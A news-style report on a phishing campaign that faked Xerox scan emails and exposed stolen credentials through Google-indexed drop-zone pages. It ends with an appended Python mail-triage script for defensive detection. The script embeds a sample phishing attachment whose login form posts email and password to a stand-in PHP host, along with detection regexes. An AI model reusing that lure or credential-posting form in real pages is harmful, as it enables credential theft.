Stolen Corporate Credentials Found in Google Searches
Hackers behind a recent phishing campaign left more than 1,000 stolen credentials available online via simple Google searches. The campaign, which began in August 2020, used e-mails that spoof notifications from Xerox scans to trick victims into clicking on malicious HTML attachments, according to security research firm Check Point Research.
Check Point worked with security firm Otorio to find the campaign, which managed to bypass Microsoft Office 365 Advanced Threat Protection (ATP) filtering to steal more than 1,000 corporate credentials. While this is a typical phishing campaign, the hackers made a mistake in their attack chain that left the stolen credentials exposed on the internet, across dozens of drop-zone servers used by the hackers. This happened because the hackers stored the stolen credentials in designated webpages on compromised servers. Since Google constantly indexes the internet, the search engine also indexed these pages, making them available to anyone who queried Google for a stolen email address.
The campaign targeted a number of industries, including retail, manufacturing, healthcare and IT. There is evidence that the campaign is not the hackers' first: the emails and JavaScript encoding used in the attacks correlate with a phishing campaign from May 2020. The phishing campaign started with an email using one of several phishing templates faking a Xerox notification, with the victim's first name or company title in the subject line. The email included an HTML file that, once opened, would present the user with a lookalike Xerox login page.
The servers used by the campaign were dozens of WordPress websites that contained malicious PHP pages and processed all incoming credentials from the phishing victims. The campaign evaded not only Microsoft Office 365 ATP but also most anti-virus protections through its simple use of compromised servers. The hackers also continuously polished and refined their code to create a realistic experience, so the victims were less suspicious and more likely to provide their login credentials.
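The lure and drop-zone pattern described above (a Xerox scan notification carrying an HTML attachment whose login form posts to a PHP page on a third-party site) as an added mail-triage example; this is not code from the original article or from Check Point's research. The sample message, sender domain and PHP endpoint are constructed, and the heuristics are assumptions for illustration.

```python
import email
import re
from email import policy

# Constructed sample: fake "scan" notification with an HTML attachment whose
# credential form posts off-site to a PHP page (the drop-zone pattern).
SAMPLE_EML = """\
From: "Xerox Scanner" <scanner@example-printer.invalid>
To: alice@example.com
Subject: Xerox Scan from Alice - Example Corp
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Your scanned document is attached.
--b1
Content-Type: text/html; name="Scan_Document.html"
Content-Disposition: attachment; filename="Scan_Document.html"

<html><body><form action="https://compromised-blog.invalid/wp-content/x.php" method="post">
<input name="email"><input name="password" type="password"></form></body></html>
--b1--
"""

# Assumed heuristics: a "Xerox ... scan" subject, plus an HTML attachment whose
# form action (or script URL) points at an external .php endpoint.
SUBJECT_RE = re.compile(r"\bxerox\b.*\bscan", re.I)
PHP_POST_RE = re.compile(r"""(?:action|url|fetch)\s*[=:(]\s*["']?(https?://[^"'\s)]+\.php)""", re.I)


def triage(raw: str) -> dict:
    """Parse a raw message and return the indicators found in it."""
    msg = email.message_from_string(raw, policy=policy.default)
    subject_hit = bool(SUBJECT_RE.search(msg.get("Subject", "")))
    html_attachments = 0
    php_targets = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if part.get_content_type() == "text/html" or name.endswith((".html", ".htm")):
            html_attachments += 1
            php_targets.extend(m.group(1) for m in PHP_POST_RE.finditer(part.get_content()))
    return {
        "subject_hit": subject_hit,
        "html_attachments": html_attachments,
        "php_targets": php_targets,
        # Flag only when the lure subject and the off-site PHP post coincide.
        "suspicious": subject_hit and html_attachments > 0 and bool(php_targets),
    }
```

The returned `php_targets` list is the defender's lead: each endpoint is a candidate compromised host to report and to check for exposed, indexed credential pages.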